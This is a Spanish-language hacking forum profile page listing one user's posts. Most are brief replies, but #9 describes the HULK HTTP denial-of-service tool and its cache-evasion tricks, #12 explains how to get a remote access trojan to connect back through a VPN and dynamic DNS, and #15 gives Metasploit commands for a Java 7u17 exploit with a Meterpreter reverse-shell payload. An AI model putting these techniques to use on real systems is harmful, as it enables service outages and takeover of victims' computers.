genial! hace tiempo lo vi pero nunca pude conseguir el 2222a.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Electrónica y Robótica / Re:Glosario electrónica.
Abril 23, 2015, 11:18:18 PM
esto me va a servir
#3
C# - VB.NET / Re:[C#] Clase DH Tools
Junio 21, 2014, 02:31:23 PM
excelente compadre gracias por el aporte
#4
Hacking / Re:Usando la herramienta "Weevely"
Marzo 11, 2014, 07:12:05 PM
Excelente compañero muy bueno tu post
#5
Cursos, manuales y libros / Re:Curso android - Desarrollo de aplicaciones móviles.
Octubre 26, 2013, 12:23:36 PM
me lo llevo
#6
Zona Webmaster / Re:[CSS] Creando el robot (logo) de Android.
Julio 31, 2013, 04:29:17 PM
como nota: aquí la mona lisa en css No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
#7
Otros lenguajes / Re:Aprende a pensar como Programador Jugando
Julio 26, 2013, 03:22:10 AM
entrete
#8
Wargames y retos / Re:[PROXIMAMENTE] Reto de esteganografia con premio en $$ [REGISTRESE AQUI]
Julio 02, 2013, 03:46:09 PM
me apunto
#9
Python / HULK, una herramienta DoS para servidores web
Junio 03, 2013, 06:18:07 PMLa mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por lo tanto, permiten mitigar sus efectos.
HULK (Http Unbearable Load King) es una sencilla herramienta DoS escrita en Python cuyo principal objetivo es generar peticiones únicas para evitar/evadir motores de caché e incidir directamente en la carga del servidor. Las principales técnicas que utiliza son las siguientes:
- Ofuscación del origen: cada petición del cliente se envía con un agente de usuario distinto seleccionado aleatoriamente de una lista.
- Falsificación de referencias: el referer que incluye la petición está ofuscado y apunta hacia el mismo servidor objetivo u otros sitios web conocidos.
- Adhesión: utiliza comandos estándar HTTP para tratar de hacer que el servidor mantenga las conexiones abiertas mediante el uso de Keep-Alive con una ventana de tiempo variable.
- no-cache: se solicita al servidor HTTP no-cache para obtener una página única.
- Transformación de URL única: para evitar la caché y otras herramientas de optimización, se utilizan nombres de parámetros y valores aleatoriamente en cada petición, lo que hace que cada petición sea única y que el servidor tenga que procesarla en cada caso.
Resultados
El autor Barry Shteiman comenta que ha realizado pruebas contra un servidor web con 4GB de RAM y Microsoft IIS7 y fue capaz de tirarlo en menos de un minuto, lanzando todas las peticiones desde un único host.
En las siguientes imágenes se puede ver la herramienta en acción donde, en la primera (#1), se ejecuta contra una URL y a continuación comienza a generar una carga de solicitudes únicas y las envía hacia el servidor objetivo (host de la URL) y, en segundo lugar (#2), podemos ver que el servidor en algún momento empieza a dejar de responder ya que ha agotado su fondo de recursos.
nota: el parámetro opcional "safe" significa matar el proceso cuando los hilos consigan un error 500.
Esta herramienta está pensada para propósitos educativos solamente y no debe ser utilizada para ninguna actividad maliciosa.
Fuentes:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#11
Dudas y pedidos generales / Re:[Duda] Sobre puertos
Abril 23, 2013, 12:52:25 PM
te hice un tuto, No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
#12
Tutoriales y Manuales de Malwares / Tu RAT no Conecta? versión facil
Abril 23, 2013, 12:50:02 PM
para los que tienen problemas al abrir puertos en tu router aqui una forma mas facil...
1- te registras en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
descargas el programa y esperas a que tengas ip nueva
Al conectarse con proxpn visiten una pagina cualquiera y las va a aparecer un anuncio para que sean premium del proxpn le dan a redireccionar y luego le dan un refresh al DUC
y tu RAT conecta
aqui un video configurando todos y probando varios RAT
1- te registras en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
descargas el programa y esperas a que tengas ip nueva
Al conectarse con proxpn visiten una pagina cualquiera y las va a aparecer un anuncio para que sean premium del proxpn le dan a redireccionar y luego le dan un refresh al DUC
y tu RAT conecta
aqui un video configurando todos y probando varios RAT
#13
Dudas y pedidos generales / Re:[Duda] Sobre puertos
Abril 23, 2013, 12:25:01 PM
bueno en se caso instalate el proxpn un vpn, el no-ip y listo te dejas de joder con abrir puertos, etc...
#14
Off Topic / Re:Listado de sitios que regalan Bitcoins
Abril 22, 2013, 01:54:07 AM
voy a ver las web mientras espero a que sincronice mi monedero
#15
Bugs y Exploits / Nuevo Bug en Java 7u17 (Video MSF) [Applet Reflection Type Confusion RCE]
Abril 21, 2013, 06:56:14 PMPareciera ser que Java no ha podido salir del hoyo en el que ha caído después de descubrirse un 0day tras otro, y como si no fuera suficiente nuevamente ha salido a la luz una nueva vulnerabilidad que afecta a Java versiones 7 update 17 y anteriores.
Fue descubierta por Jeroen Frijters que la publicó el 17-04-2013, recientemente (el 20-04-2013) Metasploit a proporcionado un módulo que explota dicha vulnerabilidad.
El módulo abusa del Java Reflection generando una Type Confusion, debido a un débil control de acceso al establecer campos finales sobre las clases estáticas, ejecutando así código fuera del Sandbox de Java. Este exploit no bypasea el click-to-play de Java, por lo cual la víctima debe aceptar la advertencia que dice que se puede ejecutar un Applet malicioso en Java.
Aquí les dejo un video con la explotación con Metasploit:
comandos:
use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.178.36
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit
getuid
sysinfo
fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#18
Dudas y pedidos generales / [SOLUCIONADO] Problema con symlink
Marzo 04, 2013, 03:33:55 PMlas veces que he intentado hacer symlink siempre me quedo aqui, con los txt sin acceso y no aparecen en la web (index of) alguna ayuda porfavor
#20
Android / Re:DSPLOIT - Una suite de android para pentesting
Febrero 20, 2013, 11:49:15 PM
interesante a ver si le pongo al tablet